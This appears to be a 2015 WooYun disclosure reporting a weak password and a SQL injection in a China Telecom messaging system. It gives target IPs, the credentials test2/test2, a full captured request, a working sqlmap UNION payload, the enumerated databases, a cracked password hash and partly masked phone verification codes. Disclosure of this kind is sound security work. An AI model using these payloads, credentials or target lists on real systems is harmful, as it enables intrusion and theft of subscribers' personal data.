当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135747

漏洞标题:运行商安全之中国电信某系统弱口令+通用SQL注入(多个省份121个账号泄露\9个库600个表数据泄露)

相关厂商:中国电信

漏洞作者: 默之

提交时间:2015-08-23 10:10

修复时间:2015-10-09 13:38

公开时间:2015-10-09 13:38

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

测试的时候真需要一些内心才行,手工检测出来有注入,丢到sqlmap跑,干别的去了,一个小时左右才返回确认注入点。。。
大量数据,包含用户住所爱好,密码等等信息,不多说了,见详情

详细说明:

地址:http://116.228.55.12/
中国电信通信助理系统入口

页面.png


#1 弱口令登陆
test2 / test2

登陆界面.png


在用户管理的地方可以看到有全国多个省份一百余名管理员或者客服账号,有工号,而且密码也是明文存储(点击编辑联系人就可以看到了),这样就可以做成一个字典,攻下更多的系统,后果不堪设想啊!
另外发现有多个省份都在用这一套系统“上海洲信版权所有 ©1997-2008”

http://61.191.40.114/
http://218.18.104.132/
http://115.168.67.196/
http://219.143.125.111/
http://222.74.229.104/
http://219.148.199.8/
http://222.85.88.201/
http://219.148.23.14


有了账号,登陆也就不是问题了。
#2 着重说一下SQL注入
在测试的时候发现在搜索框中输入'@@version',提示有语法错误,有注入存在了,其实提交'or'1'='1的时候,4000多条短信都出来了,也说明了注入的存在

注入1.png


注入2.png


抓包,丢到sqlmap里跑一下,大量数据呈现 txtKey参数存在注入

POST /Clerk_Fun/MsgAudit.aspx HTTP/1.1
Host: 116.228.55.12
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://116.228.55.12/Clerk_Fun/MsgAudit.aspx
Cookie: ASP.NET_SessionId=0xqsxcn3oehbr0ufap3v1suj; BIGipServerTongxin-C-zuoxi-app-80=664774848.20480.0000
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2708
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk3OTQ1MjgxOQ9kFgICAw9kFhBmD2QWAmYPFgIeBFRleHQF3gY8dGFibGUgIGlkPSdzbGlkZXJ0b290YWInICB3aWR0aD0nOTUlJyBib3JkZXI9JzAnIGNlbGxzcGFjaW5nPScxJyBjZWxscGFkZGluZz0nMCcgc3R5bGU9J2NvbG9yOiMwZDY3Yjk7IGZvbnQtd2VpZ2h0OmJvbGRlcjt0ZXh0LWFsaWduOmNlbnRlcjsgcGFkZGluZy1sZWZ0OjMwcHg7Jz4gPHRyPjx0ZCBoZWlnaHQ9JzUwJz48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvc3RvY2suaHRtbCcgdGFyZ2V0PSdfYmxhbmsnID7ogqHnpajmn6Xor6I8L2E%2BIDwvdGQ%2BPHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9mdW5kLmh0bWwnIHRhcmdldD0nX2JsYW5rJyA%2B5Z%2B66YeR5p%2Bl6K%2BiPC9hPjwvdGQ%2BPHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC93YXJyYW50Lmh0bWwnIHRhcmdldD0nX2JsYW5rJz4g5p2D6K%2BB5p%2Bl6K%2BiPC9hPjwvdGQ%2BPHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9nb2xkLmh0bWwnIHRhcmdldD0nX2JsYW5rJyA%2B6buE6YeR5Lu35qC8PC9hPjwvdGQ%2BPC90cj4gPHRyPjx0ZCBoZWlnaHQ9JzUwJz48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvYm9uZC5odG1sJyB0YXJnZXQ9J19ibGFuayc%2B5YC65Yi45Lu35qC8PC9hPjwvdGQ%2BPHRkPjxhICBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvZm9yZXguaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPuWkliDmsYc8L2E%2BIDwvdGQ%2BPHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9mdXR1cmVzLmh0bWwnIHRhcmdldD0nX2JsYW5rJz7mnJ8g6LSnPC9hPiA8L3RkPjx0ZD48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvZ2xvYmFsLmh0bWwnIHRhcmdldD0nX2JsYW5rJz7lhajnkIPogqHluII8L2E%2BPC90ZD48L3RyPjwvdGFibGU%2BZAIBD2QWBAIBDxAPFgYeDURhdGFUZXh0RmllbGQFBG5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJpZB4LXyFEYXRhQm91bmRnZBAVCgzmiYDmnInnsbvliKsM55WF6KGM5aSp5LiLDOaXtuWwmui%2BvuS6ugzpo5%2Flhajpo5%2Fnvo4M5qW85biC5a%2B86IiqDOWoseS5kOaYn%2BmXuwzkuZDmtLvkuIDml48S5aSp5aSp55Sf5rS75Yqp55CGDOeyvuW9qeeskeivnQznn63kv6HnpZ3npo8VCgADMTYxAzMxNwMzMTkDMzIxAzMyMwMzNjMDNDM5AzU3OQM1ODcUKwMKZ2dnZ2dnZ2dnZ2RkAgMPEGQQFQEM5omA5pyJ57G75YirFQEAFCsDAWdkZAIJDzwrAA0BAA8WBB8DZx4LXyFJdGVtQ291bnRmZGQCCg8PZA8QFgVmAgECAgIDAgQWBRYCHg5QYXJhbWV0ZXJWYWx1ZQIBFgIfBQIKFgIfBQWUASBmcm9tIG1zbV9zbXMgYSBqb2luIG1zbV9zbXN0eXBlIGMgb24gYS50eXBlaWQ9Yy5pZCB3aGVyZSAoKGEuc3RhdHVzPTAgYW5kIGEudHlwZWlkPD4yNDUpIG9yIGEuc3RhdHVzPTIgb3IgYS5zdGF0dXM9MyBvciBhLnN0YXR1cz00KSBhbmQgYy5zdGF0dXM9MSAWAh8FBRkgIGMubmFtZSBhcyB0eXBlbmFtZSxhLiogFgIfBQUBMRYFZmZmZmZkZAILDw8WAh8ABQEwZGQCDA8PFgQeDF9yZWNvcmRDb3VudGYeCV9wYWdlU2l6ZQIKZGQCDQ8PFgIfAAWUASBmcm9tIG1zbV9zbXMgYSBqb2luIG1zbV9zbXN0eXBlIGMgb24gYS50eXBlaWQ9Yy5pZCB3aGVyZSAoKGEuc3RhdHVzPTAgYW5kIGEudHlwZWlkPD4yNDUpIG9yIGEuc3RhdHVzPTIgb3IgYS5zdGF0dXM9MyBvciBhLnN0YXR1cz00KSBhbmQgYy5zdGF0dXM9MSBkZAIPDw8WAh8ABRkgIGMubmFtZSBhcyB0eXBlbmFtZSxhLiogZGQYAQUJR3JpZFZpZXcxDzwrAAoCBhUBAmlkCGZktKobFMmy%2Bwx5PrP96rUEg1hc0h8%3D&TwoDropDownList_MsgType1%24fathertype=&TwoDropDownList_MsgType1%24sontype=&TwoDropDownList_MsgType1%24hiddenfather=&TwoDropDownList_MsgType1%24hiddenson=&txtKey=%27%40%40version%27&txtAuthor=&btnSearch=%E6%9F%A5%E8%AF%A2&HiddenSelect_delete=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtKey
Type: UNION query
Title: Generic UNION query (random number) - 1 column
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk3OTQ1MjgxOQ9kFgICAw9kFhBmD2QWAmYPFgIeBFRleHQF3gY8dGFibGUgIGlkPSdzbGlkZXJ0b290YWInICB3aWR0aD0nOTUlJyBib3JkZXI9JzAnIGNlbGxzcGFjaW5nPScxJyBjZWxscGFkZGluZz0nMCcgc3R5bGU9J2NvbG9yOiMwZDY3Yjk7IGZvbnQtd2VpZ2h0OmJvbGRlcjt0ZXh0LWFsaWduOmNlbnRlcjsgcGFkZGluZy1sZWZ0OjMwcHg7Jz4gPHRyPjx0ZCBoZWlnaHQ9JzUwJz48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvc3RvY2suaHRtbCcgdGFyZ2V0PSdfYmxhbmsnID7ogqHnpajmn6Xor6I8L2E+IDwvdGQ+PHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9mdW5kLmh0bWwnIHRhcmdldD0nX2JsYW5rJyA+5Z+66YeR5p+l6K+iPC9hPjwvdGQ+PHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC93YXJyYW50Lmh0bWwnIHRhcmdldD0nX2JsYW5rJz4g5p2D6K+B5p+l6K+iPC9hPjwvdGQ+PHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9nb2xkLmh0bWwnIHRhcmdldD0nX2JsYW5rJyA+6buE6YeR5Lu35qC8PC9hPjwvdGQ+PC90cj4gPHRyPjx0ZCBoZWlnaHQ9JzUwJz48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvYm9uZC5odG1sJyB0YXJnZXQ9J19ibGFuayc+5YC65Yi45Lu35qC8PC9hPjwvdGQ+PHRkPjxhICBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvZm9yZXguaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPuWkliDmsYc8L2E+IDwvdGQ+PHRkPjxhIGhyZWY9Jy4uL0NsZXJrX0ZpbmFuY2lhbC9mdXR1cmVzLmh0bWwnIHRhcmdldD0nX2JsYW5rJz7mnJ8g6LSnPC9hPiA8L3RkPjx0ZD48YSBocmVmPScuLi9DbGVya19GaW5hbmNpYWwvZ2xvYmFsLmh0bWwnIHRhcmdldD0nX2JsYW5rJz7lhajnkIPogqHluII8L2E+PC90ZD48L3RyPjwvdGFibGU+ZAIBD2QWBAIBDxAPFgYeDURhdGFUZXh0RmllbGQFBG5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJpZB4LXyFEYXRhQm91bmRnZBAVCgzmiYDmnInnsbvliKsM55WF6KGM5aSp5LiLDOaXtuWwmui+vuS6ugzpo5/lhajpo5/nvo4M5qW85biC5a+86IiqDOWoseS5kOaYn+mXuwzkuZDmtLvkuIDml48S5aSp5aSp55Sf5rS75Yqp55CGDOeyvuW9qeeskeivnQznn63kv6HnpZ3npo8VCgADMTYxAzMxNwMzMTkDMzIxAzMyMwMzNjMDNDM5AzU3OQM1ODcUKwMKZ2dnZ2dnZ2dnZ2RkAgMPEGQQFQEM5omA5pyJ57G75YirFQEAFCsDAWdkZAIJDzwrAA0BAA8WBB8DZx4LXyFJdGVtQ291bnRmZGQCCg8PZA8QFgVmAgECAgIDAgQWBRYCHg5QYXJhbWV0ZXJWYWx1ZQIBFgIfBQIKFgIfBQWUASBmcm9tIG1zbV9zbXMgYSBqb2luIG1zbV9zbXN0eXBlIGMgb24gYS50eXBlaWQ9Yy5pZCB3aGVyZSAoKGEuc3RhdHVzPTAgYW5kIGEudHlwZWlkPD4yNDUpIG9yIGEuc3RhdHVzPTIgb3IgYS5zdGF0dXM9MyBvciBhLnN0YXR1cz00KSBhbmQgYy5zdGF0dXM9MSAWAh8FBRkgIGMubmFtZSBhcyB0eXBlbmFtZSxhLiogFgIfBQUBMRYFZmZmZmZkZAILDw8WAh8ABQEwZGQCDA8PFgQeDF9yZWNvcmRDb3VudGYeCV9wYWdlU2l6ZQIKZGQCDQ8PFgIfAAWUASBmcm9tIG1zbV9zbXMgYSBqb2luIG1zbV9zbXN0eXBlIGMgb24gYS50eXBlaWQ9Yy5pZCB3aGVyZSAoKGEuc3RhdHVzPTAgYW5kIGEudHlwZWlkPD4yNDUpIG9yIGEuc3RhdHVzPTIgb3IgYS5zdGF0dXM9MyBvciBhLnN0YXR1cz00KSBhbmQgYy5zdGF0dXM9MSBkZAIPDw8WAh8ABRkgIGMubmFtZSBhcyB0eXBlbmFtZSxhLiogZGQYAQUJR3JpZFZpZXcxDzwrAAoCBhUBAmlkCGZk0vG/TW1yaMC0yRPsaGw+0ls6Kio%3D&TwoDropDownList_MsgType1$fathertype=&TwoDropDownList_MsgType1$sontype=&TwoDropDownList_MsgType1$hiddenfather=&TwoDropDownList_MsgType1$hiddenson=&txtKey=-4553' UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(99)+CHAR(100)+CHAR(58)+CHAR(66)+CHAR(121)+CHAR(81)+CHAR(69)+CHAR(86)+CHAR(89)+CHAR(118)+CHAR(89)+CHAR(87)+CHAR(97)+CHAR(58)+CHAR(113)+CHAR(112)+CHAR(99)+CHAR(58)-- &txtAuthor='@@version'&btnSearch=%E6%9F%A5%E8%AF%A2&HiddenSelect_delete=
---
available databases [9]:
[*] Comm_Assistant_new
[*] HBSearch
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


[561 tables]
+------------------------------------------------+
| dbo.BackupSpaceTbLi |
| dbo.BackupTabToTxt |
| dbo.GS_HD_2013SecondBlacklist |
| dbo.GS_HD_2013SecondS |
| dbo.GS_HD_2013SecondS_log |
| dbo.GS_HD_2013SecondS_user_lottery |
| dbo.GS_HD_2013SecondS_user_lottery_bak20130607 |
| dbo.GS_HD_LOTTY_count |
| dbo.HBXX20130125 |
| dbo.MSM_AddressList |
| dbo.MSM_AddressList_0 |
| dbo.MSM_AddressList_1 |


[43 tables]
+-----------------------+
| dbo.dtproperties |
| dbo.msm_LiuShui_01 |
| dbo.msm_LiuShui_02 |
| dbo.msm_LiuShui_03 |
| dbo.msm_LiuShui_04 |
| dbo.msm_LiuShui_05 |
| dbo.msm_LiuShui_06 |
| dbo.msm_LiuShui_07 |
| dbo.msm_LiuShui_08 |


[31 tables]
+--------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |


[14 tables]
+--------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |


从跑出来的数据可以看到包含各种私密信息
用户资料信息

用户资料.png


用户资料1.png


可以跑出来密码,试着解密一个027AAA124D800DAA796A6596839D6B13 / a73940

密码.png


下面还有用户的信息和手机的验证码信息存储

信息.png


用户验证码.png


下面是跑出来的手机对应的验证码,手动打码

pwd2	mobile
1096 133011630**
1142 133113019**
1157 153117563**
1239 189114651**
1302 189114651**
1358 133010885**
1468 133011630**


Northwind库下面包括大量customer和employee信息

Northwind数据库.png


Northwind联系人.png


漏洞证明:

通用.png


这套系统是“上海洲信版权所有 ©1997-2008”

http://61.191.40.114/
http://218.18.104.132/
http://115.168.67.196/
http://219.143.125.111/
http://222.74.229.104/
http://219.148.199.8/
http://222.85.88.201/
http://219.148.23.14


这几个ip都是使用了这套系统,相信同样存在这个问题,即通用的sql注入

修复方案:

求给20rank

版权声明:转载请注明来源 默之@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-25 13:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-21 10:37 | 默之 ( 普通白帽子 | Rank:350 漏洞数:71 | 沉淀。)

    晕,忘了把多个省份的账号贴上去了。。。